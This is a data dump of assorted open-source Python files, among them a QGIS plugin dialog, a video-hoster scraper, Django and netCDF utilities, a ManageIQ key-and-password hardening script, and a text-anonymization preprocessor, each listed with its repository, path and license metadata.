code (string, 3 to 1.05M) | repo_name (string, 5 to 104) | path (string, 4 to 251) | language (1 class) | license (15 classes) | size (int64, 3 to 1.05M)
---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
TopoDelProp
A QGIS plugin
TopoDelProp
-------------------
begin : 2011-12-19
copyright : (C) 2011 by J. Gaspar Mora Navarro
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
"""
Form for selecting the work type (final or under edition) and the
coordinate reference system (SRC) of the work.
@author: J. Gaspar Mora Navarro.
@organization: Universidad Politécnica de Valencia. Dep Ing Cart. Geod. y Fotogrametria
@contact: [email protected]
@version: 0.1
@summary: Form for selecting the work type (final or under edition) and the
coordinate reference system (SRC) of the work.
"""
from PyQt4 import QtCore, QtGui
import sys
from TopoDelProp.forms.frmSelEsquema import Ui_frmSelEsquema
"""
sys.path.append("C:\eclipse\plugins\org.python.pydev.debug_2.3.0.2011121518\pysrc")
from pydevd import *
"""
class ctrSelEsquema(QtGui.QDialog):
"""
Used to select the work type (final or under edition) and the
coordinate reference system (SRC) of the work.
"""
#constructor
def __init__(self, oUtiles,mostrarEsquema=True):
"""
Initializes the dialog.
@type oUtiles: utils.Utiles
@param oUtiles: Object of the utils.Utiles class
"""
# Run the constructor of the parent QDialog class
QtGui.QDialog.__init__(self,oUtiles.iface.mainWindow())
# QtGui.QDialog.init(self,dlgPadre)
# Initialize the form
self.ui=Ui_frmSelEsquema() # initialize the local ui variable with the dialog
self.ui.setupUi(self)
self.oUtiles=oUtiles
self.mostrarEsquema=mostrarEsquema
self.__tipoTrabajo=None
self.__src=None
self.__esquema=None
self.rellenaListas()
if mostrarEsquema==False:
self.ui.lwSrc.setEnabled(False)
self.connect(self.ui.lwTipoTrabajo, QtCore.SIGNAL("itemClicked(QListWidgetItem*)"), self.lwTipoTrabajoClick)
self.connect(self.ui.lwSrc, QtCore.SIGNAL("itemClicked(QListWidgetItem*)"), self.lwSrcClick)
self.connect(self.ui.bttAceptar, QtCore.SIGNAL('clicked()'), self.bttAceptar)
def rellenaListas(self):
if self.oUtiles.oDicDominios!=None:
listaValores = self.oUtiles.oDicDominios.get("src_trabajo")
else:
# domains not loaded yet: the user is neither an editor nor a consultant
listaDic=self.oUtiles.oConsultasPg.recuperaDatosTablaByteaDic(nombreTabla="dom.src_trabajo", listaCampos=["src_trabajo"], condicionWhere=None,listaValoresCondWhere=None,bytea_output_to_escape=False)
if isinstance(listaDic,Exception):
QtGui.QMessageBox.information(self,"Error al cargar dom.src_trabajo",listaDic.message ,1)#self es la ventana pasdre que necesita qmessagebox
return
if len(listaDic)>0: # each row is a dictionary of field:value
listaValores=[]
for dic in listaDic:
listaValores.append(dic.get("src_trabajo"))
else:
QtGui.QMessageBox.information(self,"Error al cargar dom.src_trabajo","No se ha cargado ningún valor" ,1)#self es la ventana pasdre que necesita qmessagebox
return
if listaValores==None: # the field has no possible values
return
for valor in listaValores:
self.ui.lwSrc.addItem(valor)
self.ui.lwTipoTrabajo.addItem("Edicion")
self.ui.lwTipoTrabajo.addItem("Definitivo")
self.ui.lwTipoTrabajo.addItem("Historico")
def lwTipoTrabajoClick(self, elemClicado):
"""
Sets the tipoTrabajo property.
"""
self.__tipoTrabajo=elemClicado.text()
if self.__tipoTrabajo=="Historico":
mens=unicode("Opción todavía no programada. Elija otra.","utf-8")
QtGui.QMessageBox.information(self,"Lo sentimos",mens ,1)#self es la ventana pasdre que necesita qmessagebox
self.__tipoTrabajo=None
def lwSrcClick(self, elemClicado):
"""
Sets the src property.
"""
src=elemClicado.text()
self.__src=src
def getEsquema(self):
prefijo=self.getPrefijoTipoTrabajo()
if prefijo==None:
return None
self.__esquema=prefijo + "src" + self.__src
return self.__esquema
def getSrc(self):
return self.__src
def getTipoTrabajo(self):
if self.__tipoTrabajo==None or self.__tipoTrabajo=="Historico":
return None
return self.__tipoTrabajo
def getPrefijoTipoTrabajo(self):
if self.__tipoTrabajo==None:
return None
if self.__tipoTrabajo=="Edicion":
prefijo="ed_"
elif self.__tipoTrabajo=="Definitivo":
prefijo=""
else:
prefijo="hist_"
return prefijo
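# Illustrative note (not part of the original code): getEsquema() builds the
# schema name from the work-type prefix plus the selected SRC, so with
# tipoTrabajo == "Edicion" and a (hypothetical) SRC value of "25830" it would
# return "ed_src25830"; "Definitivo" has no prefix and would give "src25830".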
def bttAceptar(self):
self.close()
def closeEvent(self, event):
"""
Event that opens a confirmation dialog before exiting the program.
"""
# Ask the user to confirm exiting
if self.__tipoTrabajo==None:
mens=unicode("No ha seleccionado el tipo de trabajo. ¿Seguro que desea salir?","utf-8")
reply = QtGui.QMessageBox.question(self, "Mensaje", mens, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
event.accept()
else:
event.ignore()
elif self.mostrarEsquema==True:
if self.__src==None:
mens=unicode("No ha seleccionado el SRC del trabajo. ¿Seguro que desea salir?","utf-8")
reply = QtGui.QMessageBox.question(self, "Mensaje", mens, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
event.accept()
else:
event.ignore()
| gasparmoranavarro/TopoDelProp | ctr/ctrSelEsquema.py | Python | gpl-2.0 | 7,104 |
# -*- coding: utf-8 -*-
from Plugins.Extensions.MediaPortal.plugin import _
from Plugins.Extensions.MediaPortal.resources.imports import *
def promptfile(self, data, url):
if re.search('http://www.promptfile.com/file', data):
self.promptfilePost(data)
else:
chash = re.findall('type="hidden".*?"chash".*?name\s*=\s*"(.*?)"\s+value="(.*?)"', data, re.S)
if chash:
calcit = re.search('onclick=\'(.*?);', data, re.S)
if calcit:
calcData = calcit.group(1).replace('$("#chash").val()', chash[0][1]).replace('$("#chash")', chash[0][0]).replace('"','')
calcData = re.sub(r'val\((.*?)\)', r'\1' , calcData).split('.')
if len(calcData) == 2:
cval = calcData[1]
while '+' in cval:
cval = re.sub(r'(\w+)\+(\w+)', r'\1\2' , cval)
dataPost = {calcData[0]: cval}
twAgentGetPage(url, method='POST', postdata=urlencode(dataPost), agent=std_headers['User-Agent'], headers={'Accept':'*/*', 'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.promptfilePost).addErrback(self.errorload)
return
self.stream_not_found()
def promptfilePost(self, data):
stream_url = re.findall('src:\s*"(.*?)"', data, re.S)
if stream_url:
self._callback(stream_url[0])
else:
self.stream_not_found()
| schleichdi2/OpenNfr_E2_Gui-6.0 | lib/python/Plugins/Extensions/MediaPortal/resources/hosters/promptfile.py | Python | gpl-2.0 | 1,248 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-11 13:07
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('image', models.ImageField(upload_to='images')),
('old_size', models.IntegerField()),
('new_size', models.IntegerField()),
],
),
]
| hehaichi/django-imagemanagement | imagemanagement/migrations/0001_initial.py | Python | mit | 721 |
import os
path = os.path.dirname(os.path.realpath(__file__))
sbmlFilePath = os.path.join(path, 'MODEL1006230011.xml')
with open(sbmlFilePath,'r') as f:
sbmlString = f.read()
def module_exists(module_name):
try:
__import__(module_name)
except ImportError:
return False
else:
return True
if module_exists('libsbml'):
import libsbml
sbml = libsbml.readSBMLFromString(sbmlString)
| biomodels/MODEL1006230011 | MODEL1006230011/model.py | Python | cc0-1.0 | 427 |
from django import forms
from books.models import Book
class NewBookForm(forms.ModelForm):
class Meta:
model = Book
exclude = ('deleted', 'content_type',
'object_id', 'tribes', 'created')
| dongguangming/django-books | forms.py | Python | bsd-3-clause | 230 |
"""
==============
Edge operators
==============
Edge operators are used in image processing within edge detection algorithms.
They are discrete differentiation operators, computing an approximation of the
gradient of the image intensity function.
"""
import numpy as np
import matplotlib.pyplot as plt
from skimage.data import camera
from skimage.filters import roberts, sobel, scharr, prewitt
image = camera()
edge_roberts = roberts(image)
edge_sobel = sobel(image)
fig, (ax0, ax1) = plt.subplots(ncols=2, sharex=True, sharey=True, subplot_kw={'adjustable':'box-forced'})
ax0.imshow(edge_roberts, cmap=plt.cm.gray)
ax0.set_title('Roberts Edge Detection')
ax0.axis('off')
ax1.imshow(edge_sobel, cmap=plt.cm.gray)
ax1.set_title('Sobel Edge Detection')
ax1.axis('off')
plt.tight_layout()
"""
.. image:: PLOT2RST.current_figure
Different operators compute different finite-difference approximations of the
gradient. For example, the Scharr filter results in a less rotational variance
than the Sobel filter that is in turn better than the Prewitt filter [1]_ [2]_
[3]_. The difference between the Prewitt and Sobel filters and the Scharr filter
is illustrated below with an image that is the discretization of a rotation-
invariant continuous function. The discrepancy between the Prewitt and Sobel
filters, and the Scharr filter is stronger for regions of the image where the
direction of the gradient is close to diagonal, and for regions with high
spatial frequencies. For the example image the differences between the filter
results are very small and the filter results are visually almost
indistinguishable.
.. [1] https://en.wikipedia.org/wiki/Sobel_operator#Alternative_operators
.. [2] B. Jaehne, H. Scharr, and S. Koerkel. Principles of filter design. In
Handbook of Computer Vision and Applications. Academic Press, 1999.
.. [3] https://en.wikipedia.org/wiki/Prewitt_operator
"""
x, y = np.ogrid[:100, :100]
# Rotation-invariant image with different spatial frequencies
img = np.exp(1j * np.hypot(x, y)**1.3 / 20.).real
edge_sobel = sobel(img)
edge_scharr = scharr(img)
edge_prewitt = prewitt(img)
diff_scharr_prewitt = edge_scharr - edge_prewitt
diff_scharr_sobel = edge_scharr - edge_sobel
max_diff = np.max(np.maximum(diff_scharr_prewitt, diff_scharr_sobel))
fig, ((ax0, ax1), (ax2, ax3)) = plt.subplots(nrows=2, ncols=2, sharex=True, sharey=True, subplot_kw={'adjustable':'box-forced'})
ax0.imshow(img, cmap=plt.cm.gray)
ax0.set_title('Original image')
ax0.axis('off')
ax1.imshow(edge_scharr, cmap=plt.cm.gray)
ax1.set_title('Scharr Edge Detection')
ax1.axis('off')
ax2.imshow(diff_scharr_prewitt, cmap=plt.cm.gray, vmax=max_diff)
ax2.set_title('Scharr - Prewitt')
ax2.axis('off')
ax3.imshow(diff_scharr_sobel, cmap=plt.cm.gray, vmax=max_diff)
ax3.set_title('Scharr - Sobel')
ax3.axis('off')
plt.tight_layout()
plt.show()
"""
.. image:: PLOT2RST.current_figure
"""
| pratapvardhan/scikit-image | doc/examples/edges/plot_edge_filter.py | Python | bsd-3-clause | 2,909 |
# -*- coding: iso-8859-1 -*-
"""
MoinMoin - migration from base rev 1060300
Nothing to do, we just return the new data dir revision.
@copyright: 2008 by Thomas Waldmann
@license: GNU GPL, see COPYING for details.
"""
def execute(script, data_dir, rev):
return 1060400
| RealTimeWeb/wikisite | MoinMoin/script/migration/1060300.py | Python | apache-2.0 | 292 |
#!/usr/bin/env python3
"""SSH into a running appliance and configure security.
Configures security on appliance(s) according to this document:
https://access.redhat.com/articles/1124753
Works for single appliance and distributed appliance configurations.
In distributed configurations, provide the hostname of the replication
parent first, and then provide the hostnames of any child appliances using
the '-c' flag.
Example usage:
Configure security for a single appliance:
configure_security.py 10.0.0.1
Configure security for distributed appliance set:
# replication parent: 10.0.0.1
# replication child: 10.0.0.2
# replication child: 10.0.0.3
configure_security.py 10.0.0.1 -c 10.0.0.2 -c 10.0.0.3
"""
import argparse
import re
import socket
import sys
import fauxfactory
from cfme.utils.conf import credentials
from cfme.utils.ssh import SSHClient
from cfme.utils.wait import wait_for
def main():
parser = argparse.ArgumentParser(epilog=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('appliance',
help='hostname or ip address of parent appliance')
parser.add_argument('-c', action='append', dest='children',
help='hostname or ip address of child appliance')
args = parser.parse_args()
print(f"Appliance: {args.appliance}")
if args.children:
for child in args.children:
print(f"Child: {child}")
local_key_name = "v2_key_" + fauxfactory.gen_alphanumeric(8)
ssh_creds = {
'username': credentials['ssh']['username'],
'password': credentials['ssh']['password'],
}
def is_ssh_running(address):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
return s.connect_ex((address, 22)) == 0
def generate_key(address):
with SSHClient(hostname=address, **ssh_creds) as client:
print('Connecting to Appliance...')
result = client.run_command(
'ruby /var/www/miq/vmdb/tools/fix_auth.rb --key --verbose')
if result.failed:
print('Creating new encryption key failed.')
print(result.output)
sys.exit(1)
else:
print('New encryption key created.')
if args.children:
# Only copy locally if needed for child appliances
client.get_file('/var/www/miq/vmdb/certs/v2_key',
local_key_name)
def update_db_yaml(address):
with SSHClient(hostname=address, **ssh_creds) as client:
client.run_command('cd /var/www/miq/vmdb')
# TODO Issue 8595, MiqPassword alias/gem will go away
# IPAppliance.password_gem property version picks the gem name
# We only have an address here, will have to look for the gem.
result = client.run_rails_command(
'\'puts MiqPassword.encrypt("smartvm");\'')
if result.failed:
print(f'Retrieving encrypted db password failed on {address}')
sys.exit(1)
else:
encrypted_pass = result.output
result = client.run_command(
'cd /var/www/miq/vmdb; '
'sed -i.`date +%m-%d-%Y` "s/password:'
rf' .*/password: {re.escape(encrypted_pass)}/g" config/database.yml')
if result.failed:
print(f'Updating database.yml failed on {address}')
print(result.output)
sys.exit(1)
else:
print(f'Updating database.yml succeeded on {address}')
def update_password(address):
with SSHClient(hostname=address, **ssh_creds) as client:
result = client.run_command(
'ruby /var/www/miq/vmdb/tools/fix_auth.rb --hostname localhost --password smartvm')
if result.failed:
print(f'Updating DB password failed on {address}')
print(result.output)
sys.exit(1)
else:
print(f'DB password updated on {address}')
def put_key(address):
print(f'copying key to {address}')
with SSHClient(hostname=address, **ssh_creds) as client:
client.put_file(local_key_name, '/var/www/miq/vmdb/certs/v2_key')
def restart_appliance(address):
print(f'Restarting evmserverd on {address}')
with SSHClient(hostname=address, **ssh_creds) as client:
result = client.run_command('systemctl restart evmserverd')
if result.failed:
print(f"Restarting evmserverd failed on {address}")
sys.exit(1)
else:
print(f"Restarting succeeded on {address}")
# make sure ssh is ready on each appliance
wait_for(func=is_ssh_running, func_args=[args.appliance], delay=10, num_sec=600)
# generate key on master appliance
generate_key(args.appliance)
update_db_yaml(args.appliance)
# copy to other appliances
if args.children:
for child in args.children:
wait_for(func=is_ssh_running, func_args=[child], delay=10, num_sec=600)
put_key(child)
update_db_yaml(child)
# restart master appliance (and children, if provided)
restart_appliance(args.appliance)
if args.children:
for child in args.children:
restart_appliance(child)
print("Appliance(s) restarted with new key in place.")
# update encrypted passwords in each database-owning appliance.
update_password(args.appliance)
if args.children:
for child in args.children:
update_password(child)
# Restart again!
restart_appliance(args.appliance)
if args.children:
for child in args.children:
restart_appliance(child)
print("Done!")
if __name__ == '__main__':
sys.exit(main())
| ManageIQ/integration_tests | scripts/harden_security.py | Python | gpl-2.0 | 5,968 |
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="EQTransformer",
author="S. Mostafa Mousavi",
version="0.1.61",
author_email="[email protected]",
description="A python package for making and using attentive deep-learning models for earthquake signal detection and phase picking.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/smousavi05/EQTransformer",
license="MIT",
packages=find_packages(),
keywords='Seismology, Earthquakes Detection, P&S Picking, Deep Learning, Attention Mechanism',
install_requires=[
'pytest',
'numpy~=1.19.2', # appox version: numpy 1.19.x but at least 1.19.2
'keyring>=15.1',
'pkginfo>=1.4.2',
'scipy>=1.4.1',
'tensorflow~=2.5.0', # tensorflow <2.7.0 needs numpy <1.20.0
'keras==2.3.1',
'matplotlib',
'pandas',
'tqdm>=4.48.0',
'h5py~=3.1.0',
'obspy',
'jupyter'],
python_requires='>=3.6',
)
| smousavi05/EQTransformer | setup.py | Python | mit | 1,037 |
'''OpenGL extension EXT.texture_env_combine
This module customises the behaviour of the
OpenGL.raw.GL.EXT.texture_env_combine to provide a more
Python-friendly API
Overview (from the spec)
New texture environment function COMBINE_EXT allows programmable
texture combiner operations, including:
REPLACE Arg0
MODULATE Arg0 * Arg1
ADD Arg0 + Arg1
ADD_SIGNED_EXT Arg0 + Arg1 - 0.5
INTERPOLATE_EXT Arg0 * (Arg2) + Arg1 * (1-Arg2)
where Arg0, Arg1 and Arg2 are derived from
PRIMARY_COLOR_EXT primary color of incoming fragment
TEXTURE texture color of corresponding texture unit
CONSTANT_EXT texture environment constant color
PREVIOUS_EXT result of previous texture environment; on
texture unit 0, this maps to PRIMARY_COLOR_EXT
and Arg2 is restricted to the alpha component of the corresponding source.
In addition, the result may be scaled by 1.0, 2.0 or 4.0.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/texture_env_combine.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.EXT.texture_env_combine import *
from OpenGL.raw.GL.EXT.texture_env_combine import _EXTENSION_NAME
def glInitTextureEnvCombineEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
| stack-of-tasks/rbdlpy | tutorial/lib/python2.7/site-packages/OpenGL/GL/EXT/texture_env_combine.py | Python | lgpl-3.0 | 1,682 |
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python import constant_initializer as constant
from tensorflow.python import global_variables_initializer as global_variables
from tensorflow.python import local_variables_initializer as local_variables
from tensorflow.python import ones_initializer as ones
from tensorflow.python import orthogonal_initializer as orthogonal
from tensorflow.python import random_normal_initializer as random_normal
from tensorflow.python import random_uniform_initializer as random_uniform
from tensorflow.python import truncated_normal_initializer as truncated_normal
from tensorflow.python import uniform_unit_scaling_initializer as uniform_unit_scaling
from tensorflow.python import variables_initializer as variables
from tensorflow.python import variance_scaling_initializer as variance_scaling
from tensorflow.python import zeros_initializer as zeros
from tensorflow.python.keras._impl.keras.initializers import Identity as identity
| ryfeus/lambda-packs | Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/initializers/__init__.py | Python | mit | 1,088 |
# ***************************************************************************
# * Copyright (c) 2009, 2010 Yorik van Havre <[email protected]> *
# * Copyright (c) 2009, 2010 Ken Cline <[email protected]> *
# * Copyright (c) 2020 Eliud Cabrera Castillo <[email protected]> *
# * *
# * This file is part of the FreeCAD CAx development system. *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * FreeCAD is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with FreeCAD; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
"""Provides functions to create Text objects."""
## @package make_text
# \ingroup draftmake
# \brief Provides functions to create Text objects.
## \addtogroup draftmake
# @{
import FreeCAD as App
import draftutils.utils as utils
import draftutils.gui_utils as gui_utils
from draftutils.messages import _msg, _err
from draftutils.translate import translate
from draftobjects.text import Text
if App.GuiUp:
from draftviewproviders.view_text import ViewProviderText
def make_text(string, placement=None, screen=False):
"""Create a Text object containing the given list of strings.
The current color and text height and font specified in preferences
are used.
Parameters
----------
string: str, or list of str
String to display on screen.
If it is a list, each element in the list represents a new text line.
placement: Base::Placement, Base::Vector3, or Base::Rotation, optional
It defaults to `None`.
If it is provided, it is the placement of the new text.
The input could be a full placement, just a vector indicating
the translation, or just a rotation.
screen: bool, optional
It defaults to `False`, in which case the text is placed in 3D space
oriented like any other object, on top of a given plane,
by the default the XY plane.
If it is `True`, the text will always face perpendicularly
to the camera direction, that is, it will be flat on the screen.
Returns
-------
App::FeaturePython
A scripted object of type `'Text'`.
This object does not have a `Shape` attribute, as the text is created
on screen by Coin (pivy).
None
If there is a problem it will return `None`.
"""
_name = "make_text"
utils.print_header(_name, "Text")
found, doc = utils.find_doc(App.activeDocument())
if not found:
_err(translate("draft","No active document. Aborting."))
return None
_msg("string: {}".format(string))
try:
utils.type_check([(string, (str, list))], name=_name)
except TypeError:
_err(translate("draft","Wrong input: must be a list of strings or a single string."))
return None
if (type(string) is list
and not all(isinstance(element, str) for element in string)):
_err(translate("draft","Wrong input: must be a list of strings or a single string."))
return None
_msg("placement: {}".format(placement))
if not placement:
placement = App.Placement()
try:
utils.type_check([(placement, (App.Placement,
App.Vector,
App.Rotation))], name=_name)
except TypeError:
_err(translate("draft","Wrong input: must be a placement, a vector, or a rotation."))
return None
# Convert the vector or rotation to a full placement
if isinstance(placement, App.Vector):
placement = App.Placement(placement, App.Rotation())
elif isinstance(placement, App.Rotation):
placement = App.Placement(App.Vector(), placement)
new_obj = doc.addObject("App::FeaturePython",
"Text")
Text(new_obj)
new_obj.Text = string
new_obj.Placement = placement
if App.GuiUp:
ViewProviderText(new_obj.ViewObject)
h = utils.get_param("textheight", 2)
new_obj.ViewObject.DisplayMode = "3D text"
if screen:
_msg("screen: {}".format(screen))
new_obj.ViewObject.DisplayMode = "2D text"
h = h * 10
new_obj.ViewObject.FontSize = h
new_obj.ViewObject.FontName = utils.get_param("textfont", "")
new_obj.ViewObject.LineSpacing = 1
gui_utils.format_object(new_obj)
gui_utils.select(new_obj)
return new_obj
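# Illustrative usage (a sketch, assuming a document is open in FreeCAD; the
# strings and placement vector below are made up for the example):
#   t = make_text(["First line", "Second line"],
#                 placement=App.Vector(10, 10, 0))
#   t.ViewObject.FontSize = 12   # only meaningful when the GUI is up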
def makeText(stringlist, point=App.Vector(0, 0, 0), screen=False):
"""Create Text. DEPRECATED. Use 'make_text'."""
utils.use_instead("make_text")
return make_text(stringlist, point, screen)
def convert_draft_texts(textslist=None):
"""Convert the given Annotation to a Draft text.
In the past, the `Draft Text` object didn't exist; text objects
were of type `App::Annotation`. This function was introduced
to convert those older objects to a `Draft Text` scripted object.
This function was already present at splitting time during v0.19.
Parameters
----------
textslist: list of objects, optional
It defaults to `None`.
A list containing `App::Annotation` objects or a single of these
objects.
If it is `None` it will convert all objects in the current document.
"""
_name = "convert_draft_texts"
utils.print_header(_name, "Convert Draft texts")
found, doc = utils.find_doc(App.activeDocument())
if not found:
_err(translate("draft","No active document. Aborting."))
return None
if not textslist:
textslist = list()
for obj in doc.Objects:
if obj.TypeId == "App::Annotation":
textslist.append(obj)
if not isinstance(textslist, list):
textslist = [textslist]
to_delete = []
for obj in textslist:
label = obj.Label
obj.Label = label + ".old"
# Create a new Draft Text object
new_obj = make_text(obj.LabelText, placement=obj.Position)
new_obj.Label = label
to_delete.append(obj)
# Move the new object to the group which contained the old object
for in_obj in obj.InList:
if in_obj.isDerivedFrom("App::DocumentObjectGroup"):
if obj in in_obj.Group:
group = in_obj.Group
group.append(new_obj)
in_obj.Group = group
for obj in to_delete:
doc.removeObject(obj.Name)
def convertDraftTexts(textslist=[]):
"""Convert Text. DEPRECATED. Use 'convert_draft_texts'."""
utils.use_instead("convert_draft_texts")
return convert_draft_texts(textslist)
## @}
| sanguinariojoe/FreeCAD | src/Mod/Draft/draftmake/make_text.py | Python | lgpl-2.1 | 7,940 |
import logging
from flask import Flask
from honeybadger.contrib import FlaskHoneybadger
from blueprint import simple_page
logger = logging.getLogger(__name__)
app = Flask(__name__)
app.config['HONEYBADGER_ENVIRONMENT'] = 'honeybadger-example'
app.config['HONEYBADGER_API_KEY'] = '<your key>'
app.config['HONEYBADGER_PARAMS_FILTERS'] = 'password, secret, credit-card'
FlaskHoneybadger(app, report_exceptions=True)
app.register_blueprint(simple_page)
| honeybadger-io/honeybadger-python | examples/flask-blueprint/app.py | Python | mit | 454 |
'''
Doc...
@author: kmu
@since: 16. nov. 2010
'''
# Built-in
import time
import datetime
# Additional
from numpy import arange
from netCDF4 import Dataset, num2date, date2num
# Own
from pysenorge.tools.date_converters import iso2datetime
from pysenorge.set_environment import timeunit, default_UM4_width,\
default_UM4_height
def cloneUM4(masterfile, newfile, startdate='copy', tn=24, dt=3600.0):
"""
Creates a new UM4 netCDF file based on a master file.
Convention: Climate and Forecast (CF) version 1.4
@param secs: in seconds since 1970-01-01 00:00:00
"""
print "Started cloning %s as %s" % (masterfile, newfile)
# open master file
master = Dataset(masterfile, 'r')
Mdimensions = master.dimensions.keys()
# create new file
rootgrp = Dataset(newfile, 'w', format='NETCDF3_CLASSIC')
# add root dimensions
rootgrp.createDimension('time', size=tn)
rootgrp.createDimension('rlon', size=default_UM4_width)
rootgrp.createDimension('rlat', size=default_UM4_height)
rootgrp.createDimension('sigma', size=1)
# add root attributes
rootgrp.Conventions = "CF-1.4"
rootgrp.institution = "Norwegian Water Resources and Energy Directorate (NVE)"
rootgrp.source = "Compiled from several +66 hour prognoses by the Norwegian Meteorological Institute (met.no)"
rootgrp.history = "%s created" % time.ctime(time.time())
rootgrp.references = "met.no"
rootgrp.comment = "Progonosis data for www.senorge.no"
# add time variable
Mtime = master.variables['time']
# determine start date
try:
_end = date2num(iso2datetime(startdate), timeunit)
_start = _end - ((tn-1) * dt)
except ValueError:
# if the startdate is set to "copy" use the date of the last input file
Mdate = num2date(Mtime[0], timeunit).date()
utc6 = datetime.time(06, 00, 00)
_end = date2num(datetime.datetime.combine(Mdate, utc6), timeunit)
_start = _end - ((tn-1) * dt)
print (_end-_start)/dt
_time = rootgrp.createVariable('time', 'f8', ('time',))
_time[:] = arange(_start, _end+dt, dt) # ensures that _end is included
for attr in Mtime.ncattrs():
_time.setncattr(attr, Mtime.getncattr(attr))
# add rlon variable
Mrlon = master.variables['rlon']
_rlon = rootgrp.createVariable('rlon', 'f4', ('rlon',))
_rlon[:] = Mrlon[:]
for attr in Mrlon.ncattrs():
_rlon.setncattr(attr, Mrlon.getncattr(attr))
# add rlat variable
Mrlat = master.variables['rlat']
_rlat = rootgrp.createVariable('rlat', 'f4', ('rlat',))
_rlat[:] = Mrlat[:]
for attr in Mrlat.ncattrs():
_rlat.setncattr(attr, Mrlat.getncattr(attr))
# add sigma variable
try:
Msigma = master.variables['sigma']
_sigma = rootgrp.createVariable('sigma', 'i2', ('sigma',))
_sigma[:] = Msigma[:]
for attr in Msigma.ncattrs():
_sigma.setncattr(attr, Msigma.getncattr(attr))
except KeyError:
print "No variable called 'sigma'!"
for var in master.variables.keys():
# exclude the variables referring to dimensions
if var not in Mdimensions:
exec("M%s = master.variables['%s']" % (var, var))
exec("print 'Cloning %s', master.variables['%s'].dimensions" % (var, var))
exec("_%s = rootgrp.createVariable('%s', M%s.dtype, M%s.dimensions)" % (var, var, var, var))
exec("""for attr in M%s.ncattrs():\n\t_%s.setncattr(attr, M%s.getncattr(attr))""" % (var, var, var))
rootgrp.close()
master.close()
print "Cloning completed!"
if __name__ == '__main__':
pass
| kmunve/pysenorge | pysenorge/tools/clone_netCDF.py | Python | gpl-3.0 | 3,835 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
""" Converts text files into randomized sequences which
cannot be translated without the seed value. """
import cPickle as pkl
import numpy as np
import os
import nltk
import nltk.data
import codecs
import sys
""" take in raw text, converts each sentence to list of lowercase
words and returns list of sentence word lists."""
def clean_text (raw_text, detector) :
# nltk's sophisticated method for detecting sentence boundaries
sentences = detector.tokenize(raw_text.strip())
pattern = r'''(?x)
(([a-zA-Z]|ph)\.)+(\b[a-zA-Z]\b)? # accronyms/abbreviations
| \d+(\.\d+) # decimal numbers
| \w+([-']\w+)* # words/numbers incl. hyphenated
| \.\.\. # ellipsis
| [][.,;"'?():-_`] ''' # punctuation
# convert each sentence to a list of lowercase tokens
sentence_list = [nltk.regexp_tokenize(sentence.lower(),pattern)
for sentence in sentences]
return sentence_list
""" Takes in a dictionary text file and maps each word to a number
based on frequency. Returns this dictionary of mappings. """
def load_dictionary(file_path, max_index) :
words = {}
with codecs.open(file_path, 'r', 'utf-8') as f :
count = max_index
for line in f :
l = line.split(' ')
words[l[0]] = count
count -= 1
return words
""" takes a text file and encodes it as a reproducibly random
numerical sequence. The sequence cannot be converted back to
a word sequence without the seed value. """
def parse_file (file_path, word_dict, detector, seed) :
# read in file and get rid of markup
with codecs.open(file_path, 'r', 'utf-8') as f :
cleaned_sentences = clean_text(f.read(), detector)
# randomize dictionary according to seed
np.random.seed(seed)
rand_dict = dict(
zip(word_dict.keys(), np.random.permutation(word_dict.values())))
# convert each sentence to a sequence
sequence_list = [[rand_dict[word] for word in sentence if word in rand_dict]
for sentence in cleaned_sentences]
return sequence_list
""" actual script to be run """
# load these parameters once then pass into parse function
google_100k = load_dictionary('/fs3/group/chlgrp/datasets/Google-1grams/Google-1grams-top100k.txt', 100000)
seed = np.random.randint(0, 4294967295)
sentence_detector = nltk.data.load('tokenizers/punkt/english.pickle')
# call parse_file(file_path, google_100k, sentence_detector, seed) for
# each file in t
app = parse_file('/fs3/home/enagaraj/project/test_files/768.statement_of_purpose.Eela_Nagaraj.txt', google_100k, sentence_detector, seed)
"""
rand = randomize_dict(words, test_seed)
num_conversion = {}
for word in rand :
num_conversion[rand[word]] = words[word]
app = parse_file('/fs3/home/enagaraj/project/test_files/768.statement_of_purpose.Eela_Nagaraj.txt', words, sentence_detector, test_seed)
short_app = parse_file('/fs3/home/enagaraj/project/test_files/short_statement.txt', words, sentence_detector, test_seed)
"""
| eelanagaraj/IST_project | text_processing/text_preprocessing.py | Python | mit | 2,943 |
"""
